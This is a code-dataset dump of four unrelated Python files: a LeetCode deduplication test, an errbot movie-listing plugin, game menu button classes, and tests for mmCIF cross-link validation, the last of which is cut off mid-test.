hexsha: a7636d7f00af992d470b5935badc5bd779a0a79a | size: 1,187 | ext: py | lang: Python | path: 0026_RemoveDuplicatesFromSortedArray/python/test_solution.py | repo: jeffvswanson/LeetCode | head: 6bc7d6cad3c2b1bd6ccb2616ec081fb5eb51ccc8 | licenses: ["MIT"] | stars/issues/forks: null
import pytest
import solution
@pytest.mark.parametrize(
"nums,expected_list,expected_k",
[
([1, 1, 2], [1, 2, 0], 2),
([0, 0, 1, 1, 1, 2, 2, 3, 3, 4], [0, 1, 2, 3, 4, 0, 0, 0, 0, 0], 5),
([], [], 0),
([1], [1], 1),
([1, 1], [1, 1], 1),
([1, 2], [1, 2], 2),
([1, 1, 1], [1, 1, 1], 1),
([-1, 0, 0, 0, 0, 3, 3], [-1, 0, 3], 3),
],
)
def test_initial_pass(nums, expected_list, expected_k):
got = solution.initial_pass(nums)
assert got == expected_k
for i in range(expected_k):
assert nums[i] == expected_list[i]
@pytest.mark.parametrize(
"nums,expected_list,expected_k",
[
([1, 1, 2], [1, 2, 0], 2),
([0, 0, 1, 1, 1, 2, 2, 3, 3, 4], [0, 1, 2, 3, 4, 0, 0, 0, 0, 0], 5),
([], [], 0),
([1], [1], 1),
([1, 1], [1, 1], 1),
([1, 2], [1, 2], 2),
([1, 1, 1], [1, 1, 1], 1),
([-1, 0, 0, 0, 0, 3, 3], [-1, 0, 3], 3),
],
)
def test_iterative_pass(nums, expected_list, expected_k):
got = solution.iterative_pass(nums)
assert got == expected_k
for i in range(expected_k):
assert nums[i] == expected_list[i]
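The solution module under test is not included in this row. A plausible two-pointer implementation that satisfies both parametrized suites (hypothetical, for illustration only):

def initial_pass(nums):
    """Remove duplicates from a sorted list in place; return the unique count k."""
    k = 0  # next write position for a unique value
    for value in nums:
        if k == 0 or nums[k - 1] != value:
            nums[k] = value
            k += 1
    return k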
[row stats: avg_line_length 26.977273 · max_line_length 76 · alphanum_fraction 0.441449 · size_file_byte 1,187 · num_lines 43 · remaining qsc_* quality-signal values elided]
hexsha: a7a640026a13714ccba9b56c21e8b0eb80e58270 | size: 8,220 | ext: py | lang: Python | path: filmes_bot.py | repo: nananda26/pi20182 | head: 38a4dab5a9223d48552e0b6aeafaa389c238a412 | licenses: ["MIT"] | stars: 1 (2018-12-05T01:14:44.000Z) | issues: 1 (2018-12-06T22:45:17.000Z) | forks: null
from errbot import BotPlugin, botcmd, botmatch
import pymongo
class FilmesBot(BotPlugin):
'Programacao de filmes'
@botcmd
def start(self, msg, args):
yield "Em qual shopping?"
yield "/Continente_Park_Shopping"
yield "/Shopping_Itaguacu"
yield "/Shopping_Via_Catarina"
yield "/Beira_Mar_Shopping"
yield "/Floripa_Shopping"
yield "/Shopping_Iguatemi"
@botcmd
def filmes(self, msg, args):
yield "Em qual shopping?"
yield "/Continente_Park_Shopping"
yield "/Shopping_Itaguacu"
yield "/Shopping_Via_Catarina"
yield "/Beira_Mar_Shopping"
yield "/Floripa_Shopping"
yield "/Shopping_Iguatemi"
@botcmd
def Continente_Park_Shopping(self, msg, args):
yield "Os filmes disponiveis neste shopping sao:"
yield "/O_Grinch"
yield "/Bohemian_Rhapsody"
yield "/Parque_do_inferno"
@botcmd
def Shopping_Itaguacu(self, msg, args):
yield "Os filmes disponiveis neste shopping sao:"
yield "/O_Grinch"
yield "/De_repente_uma_familia"
yield "/Parque_do_inferno"
@botcmd
def Shopping_Via_Catarina(self, msg, args):
yield "Os filmes disponiveis neste shopping sao:"
yield "/O_Grinch"
yield "/Animais_Fantasticos_os_crimes_de_Grindelwald"
yield "/Bohemian_Rhapsody"
@botcmd
def Beira_Mar_Shopping(self, msg, args):
yield "Os filmes disponiveis neste shopping sao:"
yield "/Sueno_Florianopolis"
yield "/Bohemian_Rhapsody"
yield "/Entrevista_com_Deus"
@botcmd
def Floripa_Shopping(self, msg, args):
yield "Os filmes disponiveis neste shopping sao:"
yield "/Bohemian_Rhapsody"
yield "/Animais_Fantasticos_os_crimes_de_Grinderlwald"
yield "/O_Grinch"
@botcmd
def Shopping_Iguatemi(self, msg, args):
yield "Os filmes disponiveis neste shopping sao:"
yield "/Nasce_uma_estrela"
yield "/Animais_Fantasticos_os_crimes_de_Grinderlwald"
yield "/Entrevista_com_Deus"
@botcmd
def O_Grinch(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "O Grinch"})
yield 'Nome: ' + resultado['nome']
yield 'Genero: ' + resultado['genero']
yield 'Classificacao: ' + resultado['classificacao']
yield 'Duracao: ' + resultado['duracao']
yield 'Elenco: ' + resultado['elenco']
yield 'Trailer: ' + resultado['trailer']
yield '/Sinopse_O_Grinch'
@botcmd
def Sinopse_O_Grinch(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "O Grinch"})
yield resultado['sinopse']
@botcmd
def Parque_do_inferno(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "Parque do inferno"})
yield 'Nome: ' + resultado['nome']
yield 'Genero: ' + resultado['genero']
yield 'Classificacao: ' + resultado['classificacao']
yield 'Duracao: ' + resultado['duracao']
yield 'Elenco: ' + resultado['elenco']
yield 'Trailer: ' + resultado['trailer']
yield '/Sinopse_Parque_do_inferno'
@botcmd
def Sinopse_Parque_do_inferno(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "Parque do inferno"})
yield resultado['sinopse']
@botcmd
def De_repente_uma_familia(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "De repente uma família"})
yield 'Nome: ' + resultado['nome']
yield 'Genero: ' + resultado['genero']
yield 'Classificacao: ' + resultado['classificacao']
yield 'Duracao: ' + resultado['duracao']
yield 'Elenco: ' + resultado['elenco']
yield 'Trailer: ' + resultado['trailer']
yield '/Sinopse_De_repente_uma_familia'
@botcmd
def Sinopse_De_repente_uma_familia(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "De repente uma família"})
yield resultado['sinopse']
@botcmd
def Bohemian_Rhapsody(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "Bohemian Rhapsody"})
yield 'Nome: ' + resultado['nome']
yield 'Genero: ' + resultado['genero']
yield 'Classificacao: ' + resultado['classificacao']
yield 'Duracao: ' + resultado['duracao']
yield 'Elenco: ' + resultado['elenco']
yield 'Trailer: ' + resultado['trailer']
yield '/Sinopse_Bohemian_Rhapsody'
@botcmd
def Sinopse_Bohemian_Rhapsody(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "Bohemian Rhapsody"})
yield resultado['sinopse']
@botcmd
def Animais_Fantasticos_os_crimes_de_Grindelwald(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "Animais Fantásticos: os crimes de Grindelwald"})
yield 'Nome: ' + resultado['nome']
yield 'Genero: ' + resultado['genero']
yield 'Classificacao: ' + resultado['classificacao']
yield 'Duracao: ' + resultado['duracao']
yield 'Elenco: ' + resultado['elenco']
yield 'Trailer: ' + resultado['trailer']
yield '/Sinopse_Animais_Fantasticos_os_crimes_de_Grindelwald'
@botcmd
def Sinopse_Animais_Fantasticos_os_crimes_de_Grindelwald(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "Animais Fantásticos: os crimes de Grindelwald"})
yield resultado['sinopse']
@botcmd
def Sueno_Florianopolis(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "Sueño Florianópolis"})
yield 'Nome: ' + resultado['nome']
yield 'Genero: ' + resultado['genero']
yield 'Classificacao: ' + resultado['classificacao']
yield 'Duracao: ' + resultado['duracao']
yield 'Elenco: ' + resultado['elenco']
yield 'Trailer: ' + resultado['trailer']
yield '/Sinopse_Sueno_Florianopolis'
@botcmd
def Sinopse_Sueno_Florianopolis(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "Sueño Florianópolis"})
yield resultado['sinopse']
@botcmd
def Entrevista_com_Deus(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "Entrevista com Deus"})
yield 'Nome: ' + resultado['nome']
yield 'Genero: ' + resultado['genero']
yield 'Classificacao: ' + resultado['classificacao']
yield 'Duracao: ' + resultado['duracao']
yield 'Elenco: ' + resultado['elenco']
yield 'Trailer: ' + resultado['trailer']
yield '/Sinopse_Entrevista_com_Deus'
@botcmd
def Sinopse_Entrevista_com_Deus(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "Entrevista com Deus"})
yield resultado['sinopse']
@botcmd
def Nasce_uma_estrela(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "Nasce Uma Estrela"})
yield 'Nome: ' + resultado['nome']
yield 'Genero: ' + resultado['genero']
yield 'Classificacao: ' + resultado['classificacao']
yield 'Duracao: ' + resultado['duracao']
yield 'Elenco: ' + resultado['elenco']
yield 'Trailer: ' + resultado['trailer']
yield '/Sinopse_Nasce_uma_estrela'
@botcmd
def Sinopse_Nasce_uma_estrela(self, msg, args):
cliente = pymongo.MongoClient().filmes_db.Filmes
resultado = cliente.find_one({"nome": "Nasce Uma Estrela"})
yield resultado['sinopse']
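Every movie command above repeats the same Mongo lookup and field-by-field dump. A sketch of a data-driven helper that would collapse that duplication (detalhes_filme is illustrative, not part of the original plugin):

import pymongo

CAMPOS = ['nome', 'genero', 'classificacao', 'duracao', 'elenco', 'trailer']

def detalhes_filme(nome, comando_sinopse):
    # One lookup, then yield each labelled field plus the synopsis command.
    filmes = pymongo.MongoClient().filmes_db.Filmes
    filme = filmes.find_one({"nome": nome})
    for campo in CAMPOS:
        yield '{}: {}'.format(campo.capitalize(), filme[campo])
    yield comando_sinopse  # e.g. '/Sinopse_O_Grinch'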
[row stats: avg_line_length 38.591549 · max_line_length 95 · alphanum_fraction 0.642457 · size_file_byte 8,220 · num_lines 212 · remaining qsc_* quality-signal values elided]
hexsha: a7ac189e00446e27a65f8001cd7e8b8b8688e313 | size: 12,065 | ext: py | lang: Python | path: objects/buttons/__init__.py | repo: TheLokin/Kabalayn | head: 2034364e03e8eca909df11dcc393d70edd18493b | licenses: ["MIT"] | stars/issues/forks: null
from .button import Button
from .button_action import ButtonAction
from .button_option import ButtonOption
from scripts import LanguageManager, SoundManager, Configuration as Config
class ButtonPlay(ButtonAction):
instances = {}
def __new__(cls, scene):
if scene not in cls.instances:
cls.instances[scene] = super().__new__(cls)
Button.selected = cls.instances[scene]
return cls.instances[scene]
def __init__(self, scene):
super().__init__(114, 262, 15, 1, 'uiPlay')
def execute(self, scene):
self.snd_click.play()
scene.fade(self.execute_async, scene)
def execute_async(self, scene):
SoundManager.load_music('bgm_dialog.ogg')
scene.exec_play()
def key_up(self, scene):
self.snd_choice.play()
Button.selected = ButtonExit(scene)
def key_down(self, scene):
self.snd_choice.play()
Button.selected = ButtonMultiplayer(scene)
class ButtonMultiplayer(ButtonAction):
instances = {}
def __new__(cls, scene):
if scene not in cls.instances:
cls.instances[scene] = super().__new__(cls)
return cls.instances[scene]
def __init__(self, scene):
super().__init__(114, 326, 15, 1, 'uiMultiplayer')
def execute(self, scene):
self.snd_click.play()
scene.fade(scene.exec_multiplayer)
def key_up(self, scene):
self.snd_choice.play()
Button.selected = ButtonPlay(scene)
def key_down(self, scene):
self.snd_choice.play()
Button.selected = ButtonOptions(scene)
class ButtonOptions(ButtonAction):
instances = {}
def __new__(cls, scene):
if scene not in cls.instances:
cls.instances[scene] = super().__new__(cls)
return cls.instances[scene]
def __init__(self, scene):
if scene.__class__.__name__ == 'Menu':
super().__init__(114, 390, 15, 1, 'uiOptions')
elif scene.__class__.__name__ == 'Pause':
super().__init__(114, 326, 15, 1, 'uiOptions')
def execute(self, scene):
self.snd_click.play()
scene.fade(self.execute_async, scene)
def execute_async(self, scene):
Button.selected = ButtonLanguage(scene)
scene.exec_options()
def key_up(self, scene):
self.snd_choice.play()
if scene.__class__.__name__ == 'Menu':
Button.selected = ButtonMultiplayer(scene)
elif scene.__class__.__name__ == 'Pause':
Button.selected = ButtonContinue(scene)
def key_down(self, scene):
self.snd_choice.play()
if scene.__class__.__name__ == 'Menu':
Button.selected = ButtonExit(scene)
elif scene.__class__.__name__ == 'Pause':
Button.selected = ButtonQuit(scene)
class ButtonExit(ButtonAction):
instances = {}
def __new__(cls, scene):
if scene not in cls.instances:
cls.instances[scene] = super().__new__(cls)
return cls.instances[scene]
def __init__(self, scene):
super().__init__(114, 454, 15, 1, 'uiExit')
def execute(self, scene):
self.snd_click.play()
Config.save()
scene.exec_exit()
def key_up(self, scene):
self.snd_choice.play()
Button.selected = ButtonOptions(scene)
def key_down(self, scene):
self.snd_choice.play()
Button.selected = ButtonPlay(scene)
class ButtonLanguage(ButtonOption):
instances = {}
def __new__(cls, scene):
if scene not in cls.instances:
cls.instances[scene] = super().__new__(cls)
return cls.instances[scene]
def __init__(self, scene):
options = LanguageManager.languages()
super().__init__(74, 198, 20, 1, options.index(Config.lang), options, True, 'configLanguage')
self.original = Config.lang
@classmethod
def cancel(cls, scene):
button = cls.instances[scene]
button.option = button.options.index(button.original)
LanguageManager.change_language(button.original)
@classmethod
def confirm(cls, scene):
button = cls.instances[scene]
button.original = LanguageManager.languages()[button.option]
def execute(self, scene):
self.snd_choice.play()
LanguageManager.change_language(self.options[self.option])
def key_up(self, scene):
self.snd_choice.play()
Button.selected = ButtonConfirm(scene)
def key_down(self, scene):
self.snd_choice.play()
Button.selected = ButtonMasterVolume(scene)
def update(self, delta_time):
super().update(delta_time)
self.text_secondary = LanguageManager.load_text('optionLanguage')
class ButtonMasterVolume(ButtonOption):
instances = {}
def __new__(cls, scene):
if scene not in cls.instances:
cls.instances[scene] = super().__new__(cls)
return cls.instances[scene]
def __init__(self, scene):
super().__init__(74, 262, 20, 1, Config.master_volume * 10, list(range(11)), False, 'configMasterVolume')
self.original = Config.master_volume
@classmethod
def cancel(cls, scene):
button = cls.instances[scene]
button.option = int(button.original * 10)
SoundManager.set_master(button.original)
@classmethod
def confirm(cls, scene):
button = cls.instances[scene]
button.original = button.option / 10
def execute(self, scene):
self.snd_click.play()
SoundManager.set_master(self.option / 10)
def key_up(self, scene):
self.snd_choice.play()
Button.selected = ButtonLanguage(scene)
def key_down(self, scene):
self.snd_choice.play()
Button.selected = ButtonSoundVolume(scene)
def update(self, delta_time):
super().update(delta_time)
self.text_secondary = str(self.option)
class ButtonSoundVolume(ButtonOption):
instances = {}
def __new__(cls, scene):
if scene not in cls.instances:
cls.instances[scene] = super().__new__(cls)
return cls.instances[scene]
def __init__(self, scene):
super().__init__(74, 326, 20, 1, Config.sound_volume * 10, list(range(11)), False, 'configSoundVolume')
self.original = Config.sound_volume
@classmethod
def cancel(cls, scene):
button = cls.instances[scene]
button.option = int(button.original * 10)
SoundManager.set_sound(button.original)
@classmethod
def confirm(cls, scene):
button = cls.instances[scene]
button.original = button.option / 10
def execute(self, scene):
self.snd_click.play()
SoundManager.set_sound(self.option / 10)
def key_up(self, scene):
self.snd_choice.play()
Button.selected = ButtonMasterVolume(scene)
def key_down(self, scene):
self.snd_choice.play()
Button.selected = ButtonMusicVolume(scene)
def update(self, delta_time):
super().update(delta_time)
self.text_secondary = str(self.option)
class ButtonMusicVolume(ButtonOption):
instances = {}
def __new__(cls, scene):
if scene not in cls.instances:
cls.instances[scene] = super().__new__(cls)
return cls.instances[scene]
def __init__(self, scene):
super().__init__(74, 390, 20, 1, Config.music_volume * 10, list(range(11)), False, 'configMusicVolume')
self.original = Config.music_volume
@classmethod
def cancel(cls, scene):
button = cls.instances[scene]
button.option = int(button.original * 10)
SoundManager.set_music(button.original)
@classmethod
def confirm(cls, scene):
button = cls.instances[scene]
button.original = button.option / 10
def execute(self, scene):
self.snd_click.play()
SoundManager.set_music(self.option / 10)
def key_up(self, scene):
self.snd_choice.play()
Button.selected = ButtonSoundVolume(scene)
def key_down(self, scene):
self.snd_choice.play()
Button.selected = ButtonConfirm(scene)
def update(self, delta_time):
super().update(delta_time)
self.text_secondary = str(self.option)
class ButtonConfirm(ButtonAction):
instances = {}
def __new__(cls, scene):
if scene not in cls.instances:
cls.instances[scene] = super().__new__(cls)
return cls.instances[scene]
def __init__(self, scene):
super().__init__(50, 454, 10, 1, 'uiConfirm')
def execute(self, scene):
self.snd_click.play()
Config.save()
scene.fade(self.execute_async, scene)
def execute_async(self, scene):
ButtonLanguage.confirm(scene)
ButtonMasterVolume.confirm(scene)
ButtonSoundVolume.confirm(scene)
ButtonMusicVolume.confirm(scene)
Button.selected = ButtonOptions(scene)
scene.exec_confirm()
def key_up(self, scene):
self.snd_choice.play()
Button.selected = ButtonMusicVolume(scene)
def key_down(self, scene):
self.snd_choice.play()
Button.selected = ButtonLanguage(scene)
def key_left(self, scene):
self.snd_choice.play()
Button.selected = ButtonCancel(scene)
def key_right(self, scene):
self.snd_choice.play()
Button.selected = ButtonCancel(scene)
class ButtonCancel(ButtonAction):
instances = {}
def __new__(cls, scene):
if scene not in cls.instances:
cls.instances[scene] = super().__new__(cls)
return cls.instances[scene]
def __init__(self, scene):
super().__init__(258, 454, 10, 1, 'uiCancel')
def execute(self, scene):
self.snd_click.play()
scene.fade(self.execute_async, scene)
def execute_async(self, scene):
ButtonLanguage.cancel(scene)
ButtonMasterVolume.cancel(scene)
ButtonSoundVolume.cancel(scene)
ButtonMusicVolume.cancel(scene)
Button.selected = ButtonOptions(scene)
scene.exec_cancel()
def key_up(self, scene):
self.snd_choice.play()
Button.selected = ButtonMusicVolume(scene)
def key_down(self, scene):
self.snd_choice.play()
Button.selected = ButtonLanguage(scene)
def key_left(self, scene):
self.snd_choice.play()
Button.selected = ButtonConfirm(scene)
def key_right(self, scene):
self.snd_choice.play()
Button.selected = ButtonConfirm(scene)
class ButtonContinue(ButtonAction):
instances = {}
def __new__(cls, scene):
if scene not in cls.instances:
cls.instances[scene] = super().__new__(cls)
Button.selected = cls.instances[scene]
return cls.instances[scene]
def __init__(self, scene):
super().__init__(114, 262, 15, 1, 'uiContinue')
def execute(self, scene):
self.snd_click.play()
scene.exec_continue()
def key_up(self, scene):
self.snd_choice.play()
Button.selected = ButtonQuit(scene)
def key_down(self, scene):
self.snd_choice.play()
Button.selected = ButtonOptions(scene)
class ButtonQuit(ButtonAction):
instances = {}
def __new__(cls, scene):
if scene not in cls.instances:
cls.instances[scene] = super().__new__(cls)
return cls.instances[scene]
def __init__(self, scene):
super().__init__(114, 390, 15, 1, 'uiQuit')
def execute(self, scene):
self.snd_click.play()
scene.fade(scene.exec_quit)
def key_up(self, scene):
self.snd_choice.play()
Button.selected = ButtonOptions(scene)
def key_down(self, scene):
self.snd_choice.play()
Button.selected = ButtonContinue(scene)
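Each Button subclass above keeps one instance per scene by overriding __new__ with a class-level cache; note that __init__ still re-runs on every construction, which is why the subclasses keep it idempotent. The pattern in isolation (names illustrative):

class PerScene:
    instances = {}
    def __new__(cls, scene):
        # Memoize one instance per scene key; later calls return the cached object.
        if scene not in cls.instances:
            cls.instances[scene] = super().__new__(cls)
        return cls.instances[scene]

a = PerScene("menu")
b = PerScene("menu")
assert a is b                       # same scene -> same instance
assert PerScene("pause") is not a   # different scene -> distinct instance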
[row stats: avg_line_length 28.657957 · max_line_length 113 · alphanum_fraction 0.621799 · size_file_byte 12,065 · num_lines 421 · remaining qsc_* quality-signal values elided]
a7bc968f1052662832c05fcf86ffc0facbe5a759
| 15,283
|
py
|
Python
|
tests/test_cx_validation.py
|
salilab/IHMValidation
|
ddf1a080a4b7f66c2f067312f5f4a5c6584848d1
|
[
"MIT"
] | null | null | null |
tests/test_cx_validation.py
|
salilab/IHMValidation
|
ddf1a080a4b7f66c2f067312f5f4a5c6584848d1
|
[
"MIT"
] | 23
|
2020-12-09T22:27:29.000Z
|
2022-03-30T18:01:43.000Z
|
tests/test_cx_validation.py
|
salilab/IHMValidation
|
ddf1a080a4b7f66c2f067312f5f4a5c6584848d1
|
[
"MIT"
] | 1
|
2022-03-21T22:55:24.000Z
|
2022-03-21T22:55:24.000Z
|
import os, sys
import unittest
import warnings
import pandas as pd  # required by the DataFrame-based tests below
from io import StringIO, BytesIO
sys.path.insert(0, "../master/pyext/src/")
from validation import get_input_information, utility
from validation.cx import cx_validation
def ignore_warnings(test_func):
def do_test(self, *args, **kwargs):
with warnings.catch_warnings():
warnings.simplefilter("ignore", ResourceWarning)
test_func(self, *args, **kwargs)
return do_test
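# Usage sketch for the decorator above (hedged: no test in this file applies
# it yet). Decorating a test method suppresses ResourceWarning while it runs:
#
#     @ignore_warnings
#     def test_something(self):
#         ...  # ResourceWarning is ignored inside this test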
class Testing(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(Testing, self).__init__(*args, **kwargs)
#self.mmcif_test_file='test.cif'
#self.IO=cx_validation(self.mmcif_test_file)
def test_get_xl_data_1(self):
"""Test AtomSiteHandler"""
fh = """
data_PDBDEV_test
_entry.id PDBDEV_test
loop_
_ihm_cross_link_list.id
_ihm_cross_link_list.group_id
_ihm_cross_link_list.entity_description_1
_ihm_cross_link_list.entity_id_1
_ihm_cross_link_list.seq_id_1
_ihm_cross_link_list.comp_id_1
_ihm_cross_link_list.entity_description_2
_ihm_cross_link_list.entity_id_2
_ihm_cross_link_list.seq_id_2
_ihm_cross_link_list.comp_id_2
_ihm_cross_link_list.linker_type
_ihm_cross_link_list.dataset_list_id
1 1 foo 1 2 THR foo 1 3 CYS DSS 97
loop_
_struct_asym.id
_struct_asym.entity_id
_struct_asym.details
A 1 foo
"""
with open('test.cif', 'w') as fd:
fd.write(fh)
I=cx_validation('test.cif')
self.assertEqual(1,I.get_xl_data().shape[0])
self.assertEqual(10,I.get_xl_data().shape[1])
self.assertEqual('DSS',I.get_xl_data()['Linker_Name'].unique()[0])
self.assertEqual('1',I.get_xl_data()['Res1_Entity_ID'].unique()[0])
self.assertEqual(2,I.get_xl_data()['Res1_Seq_ID'].unique()[0])
self.assertEqual('1',I.get_xl_data()['Res2_Entity_ID'].unique()[0])
self.assertEqual(3,I.get_xl_data()['Res2_Seq_ID'].unique()[0])
self.assertEqual('A',I.get_xl_data()['Res1_Chain'].unique()[0])
self.assertEqual('A',I.get_xl_data()['Res2_Chain'].unique()[0])
def test_get_xl_data_2(self):
"""Test AtomSiteHandler"""
fh = """
data_PDBDEV_test
_entry.id PDBDEV_test
loop_
_ihm_cross_link_list.id
_ihm_cross_link_list.group_id
_ihm_cross_link_list.entity_description_1
_ihm_cross_link_list.entity_id_1
_ihm_cross_link_list.seq_id_1
_ihm_cross_link_list.comp_id_1
_ihm_cross_link_list.entity_description_2
_ihm_cross_link_list.entity_id_2
_ihm_cross_link_list.seq_id_2
_ihm_cross_link_list.comp_id_2
_ihm_cross_link_list.linker_type
_ihm_cross_link_list.dataset_list_id
1 1 foo 1 2 THR foo 1 3 CYS DSS 97
loop_
_struct_asym.id
_struct_asym.entity_id
_struct_asym.details
A 1 foo
"""
with open('test.cif', 'w') as fd:
fd.write(fh)
I=cx_validation('test.cif')
self.assertEqual('DSS',I.get_xl_data()['Linker_Name'].unique()[0])
self.assertEqual('1',I.get_xl_data()['Res1_Entity_ID'].unique()[0])
self.assertEqual(2,I.get_xl_data()['Res1_Seq_ID'].unique()[0])
self.assertEqual('1',I.get_xl_data()['Res2_Entity_ID'].unique()[0])
self.assertEqual(3,I.get_xl_data()['Res2_Seq_ID'].unique()[0])
self.assertEqual('A',I.get_xl_data()['Res1_Chain'].unique()[0])
self.assertEqual('A',I.get_xl_data()['Res2_Chain'].unique()[0])
def test_get_asym_for_entity(self):
"""Test AtomSiteHandler"""
fh = """
data_PDBDEV_test
_entry.id PDBDEV_test
loop_
_struct_asym.id
_struct_asym.entity_id
_struct_asym.details
A 1 foo
"""
with open('test.cif', 'w') as fd:
fd.write(fh)
I=cx_validation('test.cif')
self.assertEqual('1',list(I.get_asym_for_entity().keys())[0])
self.assertEqual(['A'],list(I.get_asym_for_entity().values())[0])
def test_get_asym_for_entity_dimer(self):
"""Test AtomSiteHandler"""
fh = """
data_PDBDEV_test
_entry.id PDBDEV_test
loop_
_struct_asym.id
_struct_asym.entity_id
_struct_asym.details
A 1 foo
B 1 foo
"""
with open('test.cif', 'w') as fd:
fd.write(fh)
I=cx_validation('test.cif')
self.assertEqual('1',list(I.get_asym_for_entity().keys())[0])
self.assertEqual(['A','B'],list(I.get_asym_for_entity().values())[0])
def test_get_sphere_model_dict(self):
fh = """
data_PDBDEV_test
_entry.id PDBDEV_test
loop_
_ihm_model_list.model_id
_ihm_model_list.model_name
_ihm_model_list.assembly_id
_ihm_model_list.protocol_id
_ihm_model_list.representation_id
1 . 1 1 1
#
loop_
_ihm_model_group.id
_ihm_model_group.name
_ihm_model_group.details
1 "Cluster 1" .
#
loop_
_ihm_model_group_link.group_id
_ihm_model_group_link.model_id
1 1
#
loop_
_ihm_sphere_obj_site.id
_ihm_sphere_obj_site.entity_id
_ihm_sphere_obj_site.seq_id_begin
_ihm_sphere_obj_site.seq_id_end
_ihm_sphere_obj_site.asym_id
_ihm_sphere_obj_site.Cartn_x
_ihm_sphere_obj_site.Cartn_y
_ihm_sphere_obj_site.Cartn_z
_ihm_sphere_obj_site.object_radius
_ihm_sphere_obj_site.rmsf
_ihm_sphere_obj_site.model_id
1 1 1 6 A 389.993 145.089 134.782 4.931 . 1
2 1 7 7 B 406.895 142.176 135.653 3.318 1.34 1
"""
with open('test.cif', 'w') as fd:
fd.write(fh)
I=cx_validation('test.cif')
self.assertEqual(2,len(I.get_sphere_model_dict()[1]))
def test_get_atom_model_dict(self):
fh = """
data_PDBDEV_test
_entry.id PDBDEV_test
loop_
_ihm_model_list.model_id
_ihm_model_list.model_name
_ihm_model_list.assembly_id
_ihm_model_list.protocol_id
_ihm_model_list.representation_id
1 . 1 1 1
#
loop_
_ihm_model_group.id
_ihm_model_group.name
_ihm_model_group.details
1 "Cluster 1" .
#
loop_
_ihm_model_group_link.group_id
_ihm_model_group_link.model_id
1 1
#
loop_
_atom_site.group_PDB
_atom_site.id
_atom_site.type_symbol
_atom_site.label_atom_id
_atom_site.label_alt_id
_atom_site.label_comp_id
_atom_site.label_seq_id
_atom_site.label_asym_id
_atom_site.Cartn_x
_atom_site.Cartn_y
_atom_site.Cartn_z
_atom_site.occupancy
_atom_site.label_entity_id
_atom_site.auth_asym_id
_atom_site.B_iso_or_equiv
_atom_site.pdbx_PDB_model_num
_atom_site.ihm_model_id
ATOM 1 N N . SER 1 A 54.401 -49.984 -35.287 . 1 A . 1 1
"""
with open('test.cif', 'w') as fd:
fd.write(fh)
I=cx_validation('test.cif')
self.assertEqual(1,len(I.get_atom_model_dict()[1]))
def test_get_xyzrseq_spheres(self):
fh = """
data_PDBDEV_test
_entry.id PDBDEV_test
loop_
_ihm_model_list.model_id
_ihm_model_list.model_name
_ihm_model_list.assembly_id
_ihm_model_list.protocol_id
_ihm_model_list.representation_id
1 . 1 1 1
#
loop_
_ihm_model_group.id
_ihm_model_group.name
_ihm_model_group.details
1 "Cluster 1" .
#
loop_
_ihm_model_group_link.group_id
_ihm_model_group_link.model_id
1 1
#
loop_
_ihm_sphere_obj_site.id
_ihm_sphere_obj_site.entity_id
_ihm_sphere_obj_site.seq_id_begin
_ihm_sphere_obj_site.seq_id_end
_ihm_sphere_obj_site.asym_id
_ihm_sphere_obj_site.Cartn_x
_ihm_sphere_obj_site.Cartn_y
_ihm_sphere_obj_site.Cartn_z
_ihm_sphere_obj_site.object_radius
_ihm_sphere_obj_site.rmsf
_ihm_sphere_obj_site.model_id
1 1 1 6 A 389.993 145.089 134.782 4.931 . 1
1 1 7 7 A 389.993 145.089 134.782 4.931 . 1
"""
with open('test.cif', 'w') as fd:
fd.write(fh)
I=cx_validation('test.cif')
spheres=I.get_sphere_model_dict()[1]
self.assertEqual((1,9),I.get_xyzrseq_spheres(spheres)[0].shape)
self.assertEqual((1,8),I.get_xyzrseq_spheres(spheres)[1].shape)
self.assertEqual('A',I.get_xyzrseq_spheres(spheres)[0]['Chain'].unique()[0])
self.assertEqual('A',I.get_xyzrseq_spheres(spheres)[1]['Chain'].unique()[0])
self.assertEqual(389.993,I.get_xyzrseq_spheres(spheres)[0]['X'].unique()[0])
self.assertEqual(145.089,I.get_xyzrseq_spheres(spheres)[1]['Y'].unique()[0])
def test_get_xyzrseq_atoms(self):
fh = """
data_PDBDEV_test
_entry.id PDBDEV_test
loop_
_ihm_model_list.model_id
_ihm_model_list.model_name
_ihm_model_list.assembly_id
_ihm_model_list.protocol_id
_ihm_model_list.representation_id
1 . 1 1 1
#
loop_
_ihm_model_group.id
_ihm_model_group.name
_ihm_model_group.details
1 "Cluster 1" .
#
loop_
_ihm_model_group_link.group_id
_ihm_model_group_link.model_id
1 1
#
loop_
_atom_site.group_PDB
_atom_site.id
_atom_site.type_symbol
_atom_site.label_atom_id
_atom_site.label_alt_id
_atom_site.label_comp_id
_atom_site.label_seq_id
_atom_site.label_asym_id
_atom_site.Cartn_x
_atom_site.Cartn_y
_atom_site.Cartn_z
_atom_site.occupancy
_atom_site.label_entity_id
_atom_site.auth_asym_id
_atom_site.B_iso_or_equiv
_atom_site.pdbx_PDB_model_num
_atom_site.ihm_model_id
ATOM 1 CA CA . SER 1 A 54.401 -49.984 -35.287 . 1 A . 1 1
"""
with open('test.cif', 'w') as fd:
fd.write(fh)
I=cx_validation('test.cif')
atom=I.get_atom_model_dict()[1]
